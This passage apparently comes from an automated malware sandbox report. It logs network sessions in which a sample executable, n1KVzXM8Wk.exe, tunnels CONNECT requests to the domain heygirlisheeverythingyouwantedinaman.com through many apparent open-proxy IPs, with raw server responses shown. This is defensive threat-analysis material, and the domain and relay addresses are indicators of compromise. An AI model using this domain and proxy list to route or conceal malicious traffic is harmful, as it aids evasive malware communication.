                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.334939957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.122039080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.641119003 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      77192.168.2.450212138.197.102.119806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.938946009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:01.950164080 CET831INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:46:01 GMT
                                                                                                      Server: Apache/2.4.18 (Ubuntu)
                                                                                                      Content-Length: 639
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      78192.168.2.449929120.197.40.21990026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.948158979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.502190113 CET311INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      79192.168.2.45021391.134.140.160119466812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.955013037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      80192.168.2.450124201.238.248.13992296812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.956242085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.474890947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.146739960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:18.475116014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.178332090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.866352081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      81192.168.2.449996150.107.136.11080826812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.969912052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.322882891 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      82192.168.2.45005827.111.83.20780806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.969983101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      83192.168.2.45020074.119.147.20941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.979759932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      84192.168.2.450239104.25.114.28806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.980807066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.068572998 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      85192.168.2.45016465.21.255.19731286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.985856056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.174321890 CET75INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:16.363260031 CET103INHTTP/1.1 400 Bad Request
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                      Data Ascii: 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      86192.168.2.450243104.17.37.235806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.986114025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.073946953 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      87192.168.2.450032221.134.152.7573026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.988003016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      88192.168.2.450160185.165.46.20831286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.988070011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.206710100 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      89192.168.2.450141190.19.114.10480806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.988074064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.537378073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.240552902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.496057034 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      90192.168.2.450190178.236.246.5331286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.004602909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.474875927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      91192.168.2.450262104.16.226.6806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.006113052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.093430042 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      92192.168.2.450081103.44.239.244806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.039050102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.756104946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.850027084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:18.216839075 CET24INData Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a
                                                                                                      Data Ascii: Keep-Alive: timeout=20
                                                                                                      Feb 23, 2024 09:45:18.216866970 CET27INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a
                                                                                                      Data Ascii: Content-Type: text/html
                                                                                                      Feb 23, 2024 09:45:18.217060089 CET20INData Raw: 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e
                                                                                                      Data Ascii: <h1>Bad Request</h1>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      93192.168.2.450280104.22.1.113806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.039753914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.127285957 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      94192.168.2.45024951.79.87.144304646812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.041085005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      95192.168.2.450295162.159.242.8806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.044826984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.132116079 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      96192.168.2.45021665.21.188.1880806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.044908047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.235245943 CET75INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:16.437067032 CET103INHTTP/1.1 400 Bad Request
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                      Data Ascii: 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      97192.168.2.45023320.111.54.16806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.046292067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.206999063 CET319INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 17
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      X-Cache: MISS from cdn-fintech.info
                                                                                                      X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                      Data Ascii: ERR_ACCESS_DENIED


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      98192.168.2.45011458.182.138.139806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.056808949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.397772074 CET310INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 150
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
